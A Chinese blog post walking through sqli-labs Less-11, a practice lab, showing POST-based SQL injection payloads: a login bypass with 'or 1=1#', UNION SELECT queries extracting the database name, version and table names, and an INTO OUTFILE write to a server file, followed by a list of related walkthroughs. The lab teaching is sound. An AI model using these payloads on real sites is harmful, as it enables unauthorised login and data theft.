sqli-labs练习(十一)--- POST-Error Based-Single quotes-String

最新推荐文章于 2022-03-12 15:56:51 发布
最新推荐文章于 2022-03-12 15:56:51 发布
阅读量329 收藏
点赞数
分类专栏: sql注入 web安全 文章标签: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/81197118
版权

这里写图片描述
一般看到这种需要登录的可能第一反应就是使用暴力破解,但是这里我们主要讨论的是sql注入,所以爆破就不在这里讲了。

发现需要登录,尝试使用万能密码登录,
万能密码的介绍:https://bbs.ichunqiu.com/thread-10851-1-1.html

payload:username=admin' or 1=1#,password=任意输入,
登录成功,同时得到了一个账号的用户名和密码。
这里写图片描述

找到了注入的方法,接下来再通过post注入得到数据库信息
payload:uname=admin' or 1=1 union select 1,2,3#&passwd=Dumb&submit=Submit发现报错,
这里写图片描述

再次尝试,发现字段有2个,获取数据库名,版本
payload:uname=1' union select database(),version()#&passwd=Dumb&submit=Submit
这里写图片描述

获取表名,
payload:uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=Dumb&submit=Submit,但是发现,输出的结果不完整,于是将结果输出到文件,但是在输出到文件时有一个注意点,就会文件目录问题,参数博文:https://blog.csdn.net/h12kjgj/article/details/77187304
payload:

uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile 'e:/wamp64/tmp/table_name.txt';
#&passwd=Dumb&submit=Submit

,将结果完整输出到文件中,但是发现在后台可以将结果输出到文件中,在前台得不到结果,如果有哪位师傅知道还请告知。

wkend
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less 11 POST -Error Based - Single quotes -String
Monster1m的博客
01-19 187
一、这一关开始是post型注入,选择用burp suite代理,开启拦截(intercept is on) 二、打开第11关,用bp拦截的话要把url的127.0.0.1改为本机的ip,要不然bp检测不到 三、提交表单发现页面开始转圈圈等待,bp也拦截到了报文 四、点击action,选择send to repeater,然后打开repeater模块 五、开始注入,在uname=后加1’,然后点击go,在右面的response查看返回的界面,发现界面有显示数据库错误信息 六、证明有注入点后,判断闭
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
luosaierdadi的博客
07-09 235
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
Sqli-Labs靶场(11--16)题解析
weixin_46099095的博客
03-12 2568
十一、Less-11:POST - Error Based - Single quotes - string(POST - 基于错误 - 单引号 - 字符串) 做此题前先复习一个语句: select username,password from users where username=' ' and password=' ' 如果想在不知道数据库账号密码的情况下获取users用户的username,password 可以使用aaa' or 1=1-- +让原本的语句变成: select user
sqli-lab教程——1-35通关
缘木之鱼
05-08 5632
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
SQLi-Labs】Less-8 Blind- Boolian- Single Quotes- String
xw1995115的博客
11-17 3501
本节来练习一下布尔盲注。 有时候,对目标网站进行注入会有这样的情况,对于用户的输入,页面不会有报错提示,只会有两种结果: 1.目标页面有内容(证明用户的输入正确有效) 2.目标界面没有内容(证明用户的输入无效,或页面将要显示的不是开发者想要给用户看的内容) 总结一句话就是,在某些时候服务器只会反馈你“说”的对不对,也就是判断你的输入为“真”或者为“假”。 这时候就要用到布尔盲注来“猜”或者“骗”服务器说出“真话”。 多说无益,实战来叙。 1.在SQLi-Labs Less-8中,添加参数...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)...
ajxi63204的博客
01-20 185
查看源码,用户名和密码通过post提交 加单引号提交 出现报错,推测对应的SQL语句 select ... from ... where xxx=''' and yyy='123' limit 0,1 直接使用or构造永真登录 成功,注意此处登录的用户为表中的第一个用户 需要改变用户可以通过改变筛选条件实现 作为表中的第二个用户登录 ...
sqli-labs练习(一)-------GET-Error based-Single quotes-String
wkend的博客
04-15 724
关于sqli-labs环境的搭建在这里不讲了,网上有很多, 初始页面 判断是否存在sql注入, 输入1,成功返回了结果 输入1',报错 输入1' and 1=1%23,返回成功, 输入1' and 1=2%23,没有返回结果 此外,除了and,还有or,+,-等,不过要注意的一点是+号在url表示为%2b,-号不用表示 根据以上结果,我们就可以判定这是字符型sq...
sqli-labs】 less44 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...
ajxi63204的博客
01-31 169
盲注漏洞,登陆失败和注入失败显示的同一个页面 可以用sleep函数通过延时判断是否闭合引号成功 这个方法有一点不好的地方在于,并不能去控制延时,延时的时间取决于users表中的数据数量和sleep函数的参数 login_user=1&login_password=1' or sleep(0.1)# 14条数据延时了1.4s 但延时的出现就证明引...
sqli-labs】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
ajxi63204的博客
01-19 426
双注入查询可以查看这两篇介绍 https://www.2cto.com/article/201302/190763.html https://www.2cto.com/article/201303/192718.html 简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来 select count(*),concat((select version())...
GET-ERROR based-Single quotesString (GET型基于错误的单引号字符型注入) Less-1
water0diamond的博客
03-12 891
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类型是否为字符串,用单引号测试,出现‘’’说明id为字符串类型 那么下面我们试着添加...
sqli-labs(十一)(二次注入)
weixin_30372371的博客
08-30 85
第二十四关: 这关考验的是sql的二次注入。 这关是一个登陆加注册的功能点,登陆的地方没有注入,账号密码都输入输入'",页面只会显示登陆失败。 但注册账号的地方没有做过滤可以注册带有单引符号的用户,比如可以直接注册一个单引符号的用户 其实从源码中可以看到,只要是用户输入的参数,再放入sql进行拼凑之前都会经过mysql_real_escape_string这个函数的转义,也就造不成注入...
sqli-lab Less-1 GET - Error based - Single quotes - String
qq_45987965的博客
08-08 208
sqli-lab Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) ctf小白的学习笔记。 1. 判断有多少列, 超出列数会报错 通过输入?id=1' order by 正整数 --+ 说明有3列,即参数传递执行的查询有3个字段。 此处有一点搞不懂,输进去1、2、3,为什么就显示两个值呢? 查了资料发现,不是所有的查询都显示在网页前端的,为了确认能否返回前端,需要进行筛选(感觉这种方法有点像信号素)。 通过?id =
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
weixin_44368248的博客
04-14 553
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 474
本节练习涉及到了一个新的概念:双注入。 双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
sqli-labs复现
09-08
要使用PHPStudy搭建SQLi-Labs,您可以按照以下步骤进行操作: 1.下载SQLi-Labs:您可以从GitHub上下载SQLi-Labs的代码并将其解压缩到您的本地计算机上。 2.安装PHPStudy:您可以从PHPStudy官网下载适用于您操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值